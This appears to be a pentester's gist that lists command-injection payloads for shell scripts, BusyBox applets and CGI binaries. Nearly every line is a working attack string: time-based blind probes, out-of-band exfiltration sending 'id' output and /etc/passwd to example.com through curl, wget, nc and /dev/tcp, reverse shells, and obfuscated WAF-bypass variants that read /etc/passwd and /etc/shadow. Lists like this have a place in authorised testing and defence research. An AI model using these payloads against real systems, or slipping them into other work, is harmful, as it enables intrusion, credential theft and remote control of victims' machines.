@win3zz
Created May 30, 2026 13:01
command-injection, RCE, OOB exfiltration, WAF-bypass - payload lists
Useful for testing shell scripts, BusyBox applets, ELF binaries, CGI binaries, init scripts, IPC handlers, configuration parsers, etc.
---
# --- TIME-BASED BLIND DETECTION ---
;sleep 10;
|sleep 10|
&sleep 10&
\nsleep 10\n
`sleep 10`
$(sleep 10)
;sleep${IFS}10;
;busybox${IFS}sleep${IFS}10;
;X=sleep;Y=10;$X$IFS$Y;
;echo${IFS}c2xlZXAgMTA=|base64${IFS}-d|sh;
;printf${IFS}'\x73\x6c\x65\x65\x70\x20\x31\x30'|sh;
;timeout 10 sh -c 'sleep 10';
;perl -e 'sleep 10';
;python -c "import time;time.sleep(10)";
;php -r "sleep(10);";
;awk 'BEGIN{system("sleep 10")}';
;sh -c "sleep 10";
;bash -c "sleep 10";
;$(sleep${IFS}10)
;`sleep${IFS}10`
;{sleep,10}
;exec sleep 10
;true|sleep 10
;false;sleep 10
# --- OUT-OF-BAND (OOB) DNS / HTTP DETECTION ---
;ping -c 4 $(whoami).example.com;
|ping -c 4 `whoami`.example.com|
&ping -c 4 $(uname -m).example.com&
$(nslookup $(whoami).example.com)
`nslookup \`uname -a\`.example.com`
;wget http://example.com/$(whoami);
|wget http://example.com/`id`|
;curl http://example.com/$(whoami);
|curl http://example.com/`id`|
;curl http://example.com/?d=$(id|base64);
;wget --post-data=$(id|base64) http://example.com/;
;curl -A $(whoami) http://example.com/
;wget --header="X-Data: $(id)" http://example.com/
;curl -d "data=$(uname -a)" http://example.com/
;wget --header="User-Agent: $(whoami)" http://example.com/
;ftp example.com <<< $(id)
;nc example.com 1234 <<< $(uname -a)
;echo $(id)|nc example.com 80
;echo $(whoami)|telnet example.com 80
;curl http://example.com/$(id|tr -d ' ')
;wget http://example.com/$(id|tr -d ' ')
# --- WAF BYPASS / SPACE OBFUSCATION VARIANTS ---
;cat$IFS/etc/passwd;
;cat${IFS}/etc/passwd;
;cat$IFS$9/etc/passwd;
;{cat,/etc/passwd};
X=$'\x20';cat$X/etc/passwd;
X=cat;Y=/etc/passwd;$X$IFS$Y;
;cat</etc/passwd;
;cat$IFS/etc/shadow;
;cat<<<"/etc/passwd";
;cat$IFS</etc/passwd;
;cat</etc/shadow;
;{cat,/etc/shadow};
;IFS=,;cat,/etc/passwd
;cat$IFS$1/etc/passwd
;cat$IFS$2/etc/passwd
;cat$IFS$PATH/etc/passwd
# --- WAF BYPASS / CHARACTER OBFUSCATION VARIANTS ---
;c\a\t /e\t\c/p\a\s\s\w\d;
;c'a't /e't'c/p'a's's'w'd;
;c"a"t /e"t"c/p"a"s"s"w"d;
;cat /et*/*passwd;
;cat /et?/pas??w;
;echo$IFS'Y2F0IC9ldGMvcGFzc3dk'$IFS|$IFS'base64'$IFS'-d'|$IFS'sh';
;printf$IFS'\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'|sh;
;c\at /etc/p\asswd
;c@t /etc/p@sswd
;c%at /etc/p%asswd
;c^at /etc/p^asswd
;c*at /etc/p*asswd
;ca\t /etc/pas\swd
;ca\t /etc/pas$IFS$swd
;echo$IFS'Y2F0IC9ldGMvc2hhZG93'|base64 -d|sh
;perl -e 'print "cat /etc/passwd\n"'|sh
;python -c "print('cat /etc/passwd')"|sh
# --- OUT-OF-BAND VIA BUILT-IN NETWORK UTILITIES (BUSYBOX COMPATIBLE) ---
;host $(whoami).example.com;
;dig $(whoami).example.com;
;telnet example.com 80 </etc/passwd;
;cat /etc/passwd > /dev/tcp/example.com/80;
;nc example.com 80 < /etc/passwd;
;nc -e /bin/sh example.com 4444
;exec 5<>/dev/tcp/example.com/80;cat /etc/passwd >&5
;bash -i >& /dev/tcp/example.com/4444 0>&1
;telnet example.com 1234 <<< $(whoami)
;ftp -n example.com <<< "quote USER $(id)"
;curl -T /etc/passwd http://example.com/
;wget --method=PUT --body-file=/etc/passwd http://example.com/
;scp /etc/passwd user@example.com:/tmp/